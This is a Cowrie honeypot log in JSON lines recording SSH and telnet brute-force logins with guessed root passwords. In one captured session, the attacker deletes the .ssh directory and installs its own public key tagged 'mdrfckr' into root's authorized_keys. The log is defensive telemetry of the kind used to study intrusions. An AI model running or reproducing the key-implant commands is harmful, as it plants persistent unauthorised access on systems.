{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:38:13.098820Z","src_ip":"212.227.125.160","session":"0aed6f044a60"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T21:38:13.345197Z","src_ip":"212.227.125.160","session":"0aed6f044a60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42945,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d8acb11277f","protocol":"telnet","message":"New connection: 212.227.125.160:42945 (1.2.3.4:23) [session: 4d8acb11277f]","sensor":"my-vps","timestamp":"2025-09-08T21:39:39.049163Z"}
{"eventid":"cowrie.session.closed","duration":13.275606870651245,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:39:52.324701Z","src_ip":"212.227.125.160","session":"4d8acb11277f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:40:13.112504Z","src_ip":"212.227.125.160","session":"0aed6f044a60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:40:52.093861Z","src_ip":"79.124.8.120","session":"c34da7b74ef0"}
{"eventid":"cowrie.session.closed","duration":180.14964866638184,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:40:52.098269Z","src_ip":"79.124.8.120","session":"c34da7b74ef0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34890,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6cbf5550d4c","protocol":"ssh","message":"New connection: 212.227.235.229:34890 (1.2.3.4:22) [session: b6cbf5550d4c]","sensor":"my-vps","timestamp":"2025-09-08T21:41:11.454877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:41:11.455693Z","src_ip":"212.227.235.229","session":"b6cbf5550d4c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T21:41:11.741717Z","src_ip":"212.227.235.229","session":"b6cbf5550d4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33938,"dst_ip":"1.2.3.4","dst_port":23,"session":"e15b116ede6b","protocol":"telnet","message":"New connection: 212.227.235.229:33938 (1.2.3.4:23) [session: e15b116ede6b]","sensor":"my-vps","timestamp":"2025-09-08T21:41:39.695067Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:41:39.903605Z","src_ip":"212.227.235.229","session":"e15b116ede6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:41:39.952142Z","src_ip":"212.227.235.229","session":"e15b116ede6b"}
{"eventid":"cowrie.session.closed","duration":"120.1","message":"Connection lost after 120.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:43:11.548437Z","src_ip":"212.227.235.229","session":"b6cbf5550d4c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52286,"dst_ip":"1.2.3.4","dst_port":22,"session":"e44319feeefc","protocol":"ssh","message":"New connection: 217.72.205.35:52286 (1.2.3.4:22) [session: e44319feeefc]","sensor":"my-vps","timestamp":"2025-09-08T21:44:32.084919Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:44:32.085935Z","src_ip":"217.72.205.35","session":"e44319feeefc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:44:39.959637Z","src_ip":"212.227.235.229","session":"e15b116ede6b"}
{"eventid":"cowrie.session.closed","duration":180.26962161064148,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:44:39.964619Z","src_ip":"212.227.235.229","session":"e15b116ede6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47412,"dst_ip":"1.2.3.4","dst_port":22,"session":"03476b044cd4","protocol":"ssh","message":"New connection: 212.227.235.229:47412 (1.2.3.4:22) [session: 03476b044cd4]","sensor":"my-vps","timestamp":"2025-09-08T21:44:48.015219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:44:48.020495Z","src_ip":"212.227.235.229","session":"03476b044cd4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:44:48.269685Z","src_ip":"212.227.235.229","session":"03476b044cd4"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:46:48.023199Z","src_ip":"212.227.235.229","session":"03476b044cd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55121,"dst_ip":"1.2.3.4","dst_port":23,"session":"8360378f8fff","protocol":"telnet","message":"New connection: 212.227.235.229:55121 (1.2.3.4:23) [session: 8360378f8fff]","sensor":"my-vps","timestamp":"2025-09-08T21:47:12.986407Z"}
{"eventid":"cowrie.session.closed","duration":12.981253147125244,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:47:25.967570Z","src_ip":"212.227.235.229","session":"8360378f8fff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33218,"dst_ip":"1.2.3.4","dst_port":22,"session":"79c3a8324c5a","protocol":"ssh","message":"New connection: 212.227.235.229:33218 (1.2.3.4:22) [session: 79c3a8324c5a]","sensor":"my-vps","timestamp":"2025-09-08T21:47:51.254982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:47:51.258753Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:47:51.537773Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasdzxc2","message":"login attempt [root/qweasdzxc2] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:47:52.669884Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:47:53.267838Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:47:53.268531Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:47:53.269427Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:47:53.556421Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:47:54.210551Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:47:54.211243Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:47:54.493579Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:47:54.494407Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34102,"dst_ip":"1.2.3.4","dst_port":22,"session":"06bb5769f61e","protocol":"ssh","message":"New connection: 212.227.235.229:34102 (1.2.3.4:22) [session: 06bb5769f61e]","sensor":"my-vps","timestamp":"2025-09-08T21:47:54.774656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:47:54.777423Z","src_ip":"212.227.235.229","session":"06bb5769f61e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:47:55.062654Z","src_ip":"212.227.235.229","session":"06bb5769f61e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:47:56.206345Z","src_ip":"212.227.235.229","session":"06bb5769f61e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:47:57.500027Z","src_ip":"212.227.235.229","session":"06bb5769f61e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34814,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dddf76d2d93","protocol":"ssh","message":"New connection: 212.227.235.229:34814 (1.2.3.4:22) [session: 5dddf76d2d93]","sensor":"my-vps","timestamp":"2025-09-08T21:47:57.779337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:47:57.782869Z","src_ip":"212.227.235.229","session":"5dddf76d2d93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:47:58.063689Z","src_ip":"212.227.235.229","session":"5dddf76d2d93"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:47:59.199436Z","src_ip":"212.227.235.229","session":"5dddf76d2d93"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:47:59.482439Z","src_ip":"212.227.235.229","session":"79c3a8324c5a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:47:59.483296Z","src_ip":"212.227.235.229","session":"5dddf76d2d93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38150,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b5b6a509426","protocol":"ssh","message":"New connection: 212.227.235.229:38150 (1.2.3.4:22) [session: 6b5b6a509426]","sensor":"my-vps","timestamp":"2025-09-08T21:48:11.938179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:48:11.939125Z","src_ip":"212.227.235.229","session":"6b5b6a509426"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:48:12.116815Z","src_ip":"212.227.235.229","session":"6b5b6a509426"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37586,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a708f39a0fc","protocol":"ssh","message":"New connection: 212.227.235.229:37586 (1.2.3.4:22) [session: 1a708f39a0fc]","sensor":"my-vps","timestamp":"2025-09-08T21:48:12.652472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:48:12.653421Z","src_ip":"212.227.235.229","session":"1a708f39a0fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-